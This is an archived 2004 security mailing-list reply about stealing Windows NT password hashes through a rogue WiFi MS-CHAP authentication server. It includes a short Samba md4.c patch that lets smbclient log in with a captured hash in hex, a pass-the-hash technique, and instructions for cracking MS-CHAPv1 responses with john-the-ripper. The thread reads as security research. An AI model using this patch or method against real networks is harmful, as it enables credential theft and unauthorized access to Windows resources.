Re[2]: Stealing NT passwords through WiFi?

From: 3APA3A (3APA3A_at_SECURITY.NNOV.RU)
Date: 05/20/04

  • Next message: auto198368_at_hushmail.com: "[Format String vulnerabilities]"
    Date: Thu, 20 May 2004 21:46:49 +0400
    To: Ugen <ugen@xonix.com>
    
    

    Dear Ugen,

    --Thursday, May 20, 2004, 7:31:38 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

    >>
    >>
    U> I am under impression that as an authentication server the rogue system
    U> can require any version of
    U> MS-CHAP it chooses. If the original system is configured to support both
    U> (and XP supplicant does,
    U> not even sure if there is an easy way to force v2. only) the reply will

    I have no Wi-Fi to check, for dialup connection you can (advanced
    settings of security option for connection).

    U> include LM hash. Got to test
    U> that, of course.

    It depends on security settings. Group policy (or local security policy)
    can prevent system from handshaking LM response and from storing LM
    hash.

    >>It doesn't matter if you recover cleartext password by bruterforcing
    >>password or you recover password hash by cracking DES, because with
    >>password hash you can connect to any resource without cleartext
    >>password.
    >>
    >>
    U> I took a shortcut in description here indeed :) This is the crucial
    U> point though - I haven't found
    U> ready made tools to work this step, though there was mention somewhere

    I patched md4.c from Samba distribution to convert from hex instead of
    hashing password (NT hash is actually an MD4 from Unicode password) if
    already given something like hash (32 Unicode [0-9A-F] charecters). This
    small patch allows to use smbclient with a hash in a hex instead of
    cleartext password.

            D = 0x10325476;
    +
    +
    + if(n == 64){
    + int j;
    + unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
    + for(j = 0; j<16; j++){
    + if(!strchr(hexd, in[(j<<2)]))break;
    + if(in[(j<<2)+1])break;
    + if(!strchr(hexd, in[(j<<2)+2]))break;
    + if(in[(j<<2)+3])break;
    + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
    + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
    + }
    + if(j == 16) {
    + return;
    + }
    + }
                                                                                    
            while (n > 64) {

    U> that l0phtcrack is able
    U> to use MS-CHAP (no version specified) data as an input. This is where
    U> I'd welcome good
    U> suggestions.

    Any NTLM cracking tool is OK for MS-CHAPv1. For DES bruteforcing you can
    use any DES cracking tool, like john-the-ripper with challenge as a salt
    and each 8 bytes of the response as a crypted password. First 16 of
    resulting 21 bytes are password hash. Approx. half of year is required
    to crack 3 DES portions on single PC (because full bruteforcing is
    required) with fast "sliced" DES implementation. Test code I wrote works
    too slow, because standard DES it used.

    -- 
    ~/ZARAZA
    Жало мне не понадобится (С. Лем)
    

  • Next message: auto198368_at_hushmail.com: "[Format String vulnerabilities]"

    Relevant Pages

    • Re: What is md5sum?
      ... As I recall, the salt was the time stamp, so that would ... ]> Also, for the old Unix des based password, the probability of an overlap ... that recursion in the encryption makes it ... That IS the DES based hash. ...
      (comp.os.linux.setup)
    • howto set MD4 NT Hash in AD and/or Local SAM
      ... Does ANYBODY know how to set the MD4 NT Hash in AD and/or the local SAM??? ... can find and was successful at setting the old DES style password using ... pointless to still offer a way to set the DES password, ...
      (microsoft.public.win2000.active_directory)
    • Re: A New Threat for password hacking
      ... Passwords in RACF db are stored using DES, ... as a hash. ... I used SHA1 for my example since it's the one with the smallest bit ...
      (bit.listserv.ibm-main)
    • RE: Password security
      ... Subject: Password security ... have you changed the hash from DES to something different? ... with "unsubscribe freebsd-security" in the body of the message ...
      (FreeBSD-Security)